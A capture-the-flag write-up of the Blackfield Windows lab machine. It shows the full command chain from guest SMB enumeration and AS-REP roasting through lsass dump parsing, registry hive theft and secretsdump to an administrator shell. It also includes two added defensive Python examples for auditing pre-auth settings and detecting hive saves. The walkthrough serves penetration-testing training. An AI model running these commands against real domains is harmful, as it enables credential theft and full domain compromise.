Blackfield is a hard Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. One user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This lets us retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute-force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artifacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.

Nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-28 22:58:26Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

Looking into shares:

nxc smb blackfield.local -u Guest -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Guest:
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share

Since Guest was enabled, I tried getting users by RID brute-forcing. This gave us a lot of users.

$ nxc smb blackfield.local -u Guest -p '' --rid-brute
<SNIP>
SMB 10.10.10.192 445 DC01 1000: BLACKFIELD\DC01$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
SMB 10.10.10.192 445 DC01 1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.10.192 445 DC01 1103: BLACKFIELD\audit2020 (SidTypeUser)
SMB 10.10.10.192 445 DC01 1104: BLACKFIELD\support (SidTypeUser)
SMB 10.10.10.192 445 DC01 1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
SMB 10.10.10.192 445 DC01 1106: BLACKFIELD\BLACKFIELD538365 (SidTypeUser)
<SNIP>
SMB 10.10.10.192 445 DC01 1411: BLACKFIELD\BLACKFIELD653097 (SidTypeUser)
SMB 10.10.10.192 445 DC01 1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
SMB 10.10.10.192 445 DC01 1413: BLACKFIELD\svc_backup (SidTypeUser)
SMB 10.10.10.192 445 DC01 1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
SMB 10.10.10.192 445 DC01 1415: BLACKFIELD\PC01$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1416: BLACKFIELD\PC02$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1417: BLACKFIELD\PC03$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1418: BLACKFIELD\PC04$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1419: BLACKFIELD\PC05$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1420: BLACKFIELD\PC06$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1421: BLACKFIELD\PC07$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1422: BLACKFIELD\PC08$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1423: BLACKFIELD\PC09$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1424: BLACKFIELD\PC10$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1425: BLACKFIELD\PC11$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1426: BLACKFIELD\PC12$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1427: BLACKFIELD\PC13$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
SMB 10.10.10.192 445 DC01 1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)

KERBEROS

From there I validated users via kerbrute. All of them seemed to be valid, so that's a drag.

$ kerbrute userenum --dc 10.10.10.192 -d blackfield.local users.list

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/28/25 - Ronnie Flathers @ropnop

2025/02/28 11:30:45 > Using KDC(s):
2025/02/28 11:30:45 > 10.10.10.192:88

2025/02/28 11:30:50 > [+] VALID USERNAME: Administrator@blackfield.local
2025/02/28 11:30:50 > [+] VALID USERNAME: audit2020@blackfield.local
2025/02/28 11:30:50 > [+] VALID USERNAME: BLACKFIELD189208@blackfield.local
2025/02/28 11:30:50 > [+] VALID USERNAME: DC01$@blackfield.local
2025/02/28 11:30:50 > [+] VALID USERNAME: Guest@blackfield.local
2025/02/28 11:30:50 > [+] VALID USERNAME: support@blackfield.local
<SNIP>
2025/02/28 11:33:27 > [+] VALID USERNAME: svc_backup@blackfield.local
2025/02/28 11:33:27 > [+] VALID USERNAME: BLACKFIELD438814@blackfield.local
2025/02/28 11:33:27 > [+] VALID USERNAME: BLACKFIELD653097@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC10$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC07$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: SRV-WEB$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC09$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC13$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC11$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC05$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC06$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC08$@blackfield.local
2025/02/28 11:33:32 > [+] VALID USERNAME: PC12$@blackfield.local
2025/02/28 11:33:38 > [+] VALID USERNAME: SRV-EXCHANGE$@blackfield.local
2025/02/28 11:33:38 > [+] VALID USERNAME: SRV-FILE$@blackfield.local
2025/02/28 11:33:38 > [+] VALID USERNAME: SRV-INTRANET$@blackfield.local
2025/02/28 11:33:38 > Done! Tested 333 usernames (332 valid) in 172.662 seconds

Nevertheless, I wanted to see if anyone has pre-auth disabled. We got one user: support.

$ GetNPUsers.py -dc-ip 10.10.10.192 -dc-host blackfield.local -usersfile users.list -no-pass 'blackfield.local/'

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:a0fc2d3cd96d551c43ed7ddfcf9f0efa$9861e8be198b1bbf19120a2f99a8<SNIP>
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD538365 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD189208 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD404458 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BLACKFIELD706381 doesn't have UF_DONT_REQUIRE_PREAUTH set
<SNIP>

GREAT SUCCESS
Cracking this with hashcat gives us a clear text password.

$ hashcat support.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5asrep$23$support@BLACKFIELD.LOCAL:a0fc2d3cd96d551c43ed7ddfcf9f0efa$9861e8be198b1bbf19120a2f99a8d05d7363d86f881bc81256c8271b7f1985c<SNIP>4ea9c8feea6ec223314fc227ee3c240d7f03998089456763f2cdb4aace7a32d41f6f9b9b11d2553afdb985948a6f58e2366b804:<SNIP>
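As an added defender-side example (not code from the original writeup), here are the audit checks behind the two steps above: flagging accounts whose userAccountControl carries UF_DONT_REQUIRE_PREAUTH (the flag GetNPUsers.py reports on, including why a disabled account answers with KDC_ERR_CLIENT_REVOKED instead of an AS-REP), and parsing the $krb5asrep$ line that hashcat identified as mode 18200 so the affected account and realm can be remediated. The UAC bit values are the standard AD ones; the sample accounts and hash string are constructed.

```python
import re

# userAccountControl bits (values from the AD schema).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the bit GetNPUsers.py reports on


def preauth_disabled(uac: int) -> bool:
    """True when the account answers an AS-REQ without pre-authentication."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def find_asreproastable(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl) pairs.
    Returns [(name, enabled)] for every account with pre-auth disabled.
    A disabled account still carries the flag, but the KDC answers
    KDC_ERR_CLIENT_REVOKED instead of an AS-REP, so it is reported with
    enabled=False (still worth fixing before the account is re-enabled).
    """
    hits = []
    for name, uac in accounts:
        if preauth_disabled(uac):
            hits.append((name, not uac & UF_ACCOUNTDISABLE))
    return hits


# hashcat mode 18200 layout: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line: str) -> dict:
    """Split a $krb5asrep$ line into its fields; raise ValueError if malformed."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        raise ValueError("not a krb5asrep hash line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    # etype 23 is RC4-HMAC: the cheapest type to crack and a sign the
    # account (or domain) still permits RC4 for Kerberos.
    fields["rc4"] = fields["etype"] == 23
    return fields


# Constructed sample data (not from the writeup).
SAMPLE_ACCOUNTS = [
    ("Administrator", UF_NORMAL_ACCOUNT | 0x10000),  # DONT_EXPIRE_PASSWD
    ("support", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ("olduser", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE),
]
SAMPLE_HASH = "$krb5asrep$23$support@BLACKFIELD.LOCAL:" + "a0" * 16 + "$" + "9861" * 12

if __name__ == "__main__":
    print(find_asreproastable(SAMPLE_ACCOUNTS))
    print(parse_asrep_hash(SAMPLE_HASH)["user"], parse_asrep_hash(SAMPLE_HASH)["rc4"])
```

Feed find_asreproastable with the (sAMAccountName, userAccountControl) pairs from an LDAP export to get the list the KDC would hand out AS-REPs for; clearing the flag on each one is the fix.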

BloodHound

Now we have some credentials to get a bloodhound dump.

$ nxc ldap 10.10.10.192 -u support -p '<SNIP>' --dns-server 10.10.10.192 --bloodhound -c All
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:<SNIP>
LDAP 10.10.10.192 389 DC01 Resolved collection methods: rdp, acl, container, session, trusts, psremote, dcom, objectprops, localadmin, group
LDAP 10.10.10.192 389 DC01 Done in 00M 08S
LDAP 10.10.10.192 389 DC01 Compressing output into /home/jaybit/.nxc/logs/DC01_10.10.10.192_2025-02-28_114320_bloodhound.zip

Looking at our pwned user support, we see we have ForceChangePassword over audit2020. So using bloodyAD (my favourite), we change his password.

$ ./bloodyAD.py -v DEBUG -u 'support' -p '<SNIP>' --host 10.10.10.192 -d blackfield.local set password audit2020 Password123
[*] Trying to connect to 10.10.10.192...
[+] Connection successful
[+] Password changed successfully!

Now back to SMB to see what he has access to.

SMB Round 2

Running NetExec shows we have READ on the forensic share.

$ nxc smb blackfield.local -u audit2020 -p Password123 --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share

Looking into this share with impacket-smbclient showed us a couple of directories to choose from.

$ impacket-smbclient -dc-ip 10.10.10.192 'blackfield.local/audit2020:Password123@blackfield.local'
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use forensic
# ls
drw-rw-rw- 0 Sun Feb 23 09:10:16 2020 .
drw-rw-rw- 0 Sun Feb 23 09:10:16 2020 ..
drw-rw-rw- 0 Sun Feb 23 12:14:37 2020 commands_output
drw-rw-rw- 0 Thu May 28 15:29:24 2020 memory_analysis
drw-rw-rw- 0 Fri Feb 28 16:30:34 2020 tools

This looks like a dump of some sort from the DC, based on the tools and commands_output directories.

Tools Directory:

# ls
drw-rw-rw- 0 Fri Feb 28 16:30:34 2020 .
drw-rw-rw- 0 Fri Feb 28 16:30:34 2020 ..
drw-rw-rw- 0 Fri Feb 28 16:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw- 0 Fri Feb 28 16:30:35 2020 sysinternals
drw-rw-rw- 0 Fri Feb 28 16:30:35 2020 volatility

Commands_output Directory:

# ls
drw-rw-rw- 0 Sun Feb 23 12:14:37 2020 .
drw-rw-rw- 0 Sun Feb 23 12:14:37 2020 ..
-rw-rw-rw- 528 Sun Feb 23 12:12:54 2020 domain_admins.txt
-rw-rw-rw- 962 Sun Feb 23 12:12:54 2020 domain_groups.txt
-rw-rw-rw- 16454 Fri Feb 28 16:32:17 2020 domain_users.txt
-rw-rw-rw- 518202 Sun Feb 23 12:12:54 2020 firewall_rules.txt
-rw-rw-rw- 1782 Sun Feb 23 12:12:54 2020 ipconfig.txt
-rw-rw-rw- 3842 Sun Feb 23 12:12:54 2020 netstat.txt
-rw-rw-rw- 3976 Sun Feb 23 12:12:54 2020 route.txt
-rw-rw-rw- 4550 Sun Feb 23 12:12:54 2020 systeminfo.txt
-rw-rw-rw- 9990 Sun Feb 23 12:12:54 2020 tasklist.txt

Memory_analysis Directory:

# cd ../memory_analysis
# ls
drw-rw-rw- 0 Thu May 28 15:29:24 2020 .
drw-rw-rw- 0 Thu May 28 15:29:24 2020 ..
-rw-rw-rw- 37876530 Thu May 28 15:29:24 2020 conhost.zip
-rw-rw-rw- 24962333 Thu May 28 15:29:24 2020 ctfmon.zip
-rw-rw-rw- 23993305 Thu May 28 15:29:24 2020 dfsrs.zip
-rw-rw-rw- 18366396 Thu May 28 15:29:24 2020 dllhost.zip
-rw-rw-rw- 8810157 Thu May 28 15:29:24 2020 ismserv.zip
-rw-rw-rw- 41936098 Thu May 28 15:29:24 2020 lsass.zip
-rw-rw-rw- 64288607 Thu May 28 15:29:24 2020 mmc.zip
-rw-rw-rw- 13332174 Thu May 28 15:29:24 2020 RuntimeBroker.zip
-rw-rw-rw- 131983313 Thu May 28 15:29:24 2020 ServerManager.zip
-rw-rw-rw- 33141744 Thu May 28 15:29:24 2020 sihost.zip
-rw-rw-rw- 33756344 Thu May 28 15:29:24 2020 smartscreen.zip
-rw-rw-rw- 14408833 Thu May 28 15:29:24 2020 svchost.zip
-rw-rw-rw- 34631412 Thu May 28 15:29:24 2020 taskhostw.zip
-rw-rw-rw- 14255089 Thu May 28 15:29:24 2020 winlogon.zip
-rw-rw-rw- 4067425 Thu May 28 15:29:24 2020 wlms.zip
-rw-rw-rw- 18303252 Thu May 28 15:29:24 2020 WmiPrvSE.zip

The lsass.zip caught my eye, so I downloaded it to my machine and unzipped it.

$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
$ file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type

So we have a dump. We can use the python3 module pypykatz to parse it. This dumps everything, including svc_backup's hash.

$ python3 -m pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: <SNIP>
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
<SNIP>

Shell as svc_backup

Getting on the box and seeing what privileges we have:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
<SNIP>
GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
<SNIP>
PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
<SNIP>

So we're part of Backup Operators. Shouldn't be too hard. Let's back up the SAM, SYSTEM, and SECURITY hives.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\sam SAM.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system SYSTEM.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\security SECURITY.save
reg.exe : ERROR: Access is denied.
+ CategoryInfo : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

Hmmm... can't back up SECURITY locally, let's try remotely.

$ reg.py 'blackfield.local'/'svc_backup'@'10.10.10.192' -hashes :<SNIP> save -keyName 'HKLM\SECURITY' -o 'C:\Users\svc_backup\Documents\'
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to C:\Users\svc_backup\Documents\\SECURITY.save
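As an added detection example (not part of the original writeup), the local hive saves above are exactly what process-creation auditing (Security event 4688 with command-line logging, or Sysmon event 1) makes visible. The helper below normalises a reg.exe command line, reports which credential-bearing HKLM hives it exports, and aggregates per account so a user who collected all three hives stands out. The event records are constructed samples, not the writeup's logs.

```python
import shlex

# Root-key spellings reg.exe accepts, mapped to a canonical name.
ROOT_ALIASES = {"hklm": "HKLM", "hkey_local_machine": "HKLM"}
# Hives that together let secretsdump.py recover SAM hashes and LSA secrets.
SENSITIVE_HIVES = {"SAM", "SYSTEM", "SECURITY"}


def hive_save_targets(cmdline: str) -> set:
    """Return the sensitive HKLM hives a `reg save`/`reg export` line targets.
    Anything that is not reg.exe, or not a save/export verb, yields an empty set.
    """
    try:
        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = [a.strip('"') for a in cmdline.split()]
    if len(argv) < 3:
        return set()
    exe = argv[0].rsplit("\\", 1)[-1].lower()
    if exe not in ("reg", "reg.exe") or argv[1].lower() not in ("save", "export"):
        return set()
    hits = set()
    for arg in argv[2:]:
        parts = arg.replace("/", "\\").split("\\")
        if len(parts) >= 2 and ROOT_ALIASES.get(parts[0].lower()) == "HKLM":
            if parts[1].upper() in SENSITIVE_HIVES:
                hits.add(parts[1].upper())
    return hits


def hive_dumps_by_user(events) -> dict:
    """Aggregate hive saves per account from parsed process-creation events
    (dicts with 'user' and 'cmdline'). Process creation is logged even when
    the save itself fails with 'Access is denied', as SECURITY did above,
    so that attempt is still visible.
    """
    by_user = {}
    for ev in events:
        hives = hive_save_targets(ev.get("cmdline", ""))
        if hives:
            by_user.setdefault(ev["user"], set()).update(hives)
    return by_user


def complete_dump_sets(by_user: dict) -> list:
    """Users who saved all three hives, i.e. enough for an offline secrets dump."""
    return sorted(u for u, hives in by_user.items() if hives >= SENSITIVE_HIVES)


# Constructed sample events (not from the writeup's logs).
SAMPLE_EVENTS = [
    {"user": "svc_backup", "cmdline": r"reg.exe save hklm\sam SAM.save"},
    {"user": "svc_backup", "cmdline": r"reg.exe save hklm\system SYSTEM.save"},
    {"user": "svc_backup", "cmdline": r'"C:\Windows\System32\reg.exe" save HKEY_LOCAL_MACHINE\SECURITY C:\tmp\sec.hiv'},
    {"user": "jdoe", "cmdline": r"reg.exe query hklm\software\microsoft\windows\currentversion\run"},
]
```

The remote variant with reg.py never runs reg.exe on the host, so this check will not see it; that path shows up instead as the RemoteRegistry service being started over the named pipe and the hive file being written into the user's directory, which needs separate telemetry.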

Now we can download them to our machine and dump the secrets.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls


Directory: C:\Users\svc_backup\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 3:54 PM 45056 SAM.save
-a---- 2/28/2025 6:02 PM 32768 SECURITY.save
-a---- 2/28/2025 3:54 PM 17371136 SYSTEM.save

All the SECRETS!!!

$ secretsdump.py -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Cleaning up...

Shell as Administrator

Finally, we are administrator on the machine.

$ evil-winrm -i blackfield.local -u Administrator -p <SNIP>

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname
blackfield\administrator
DC01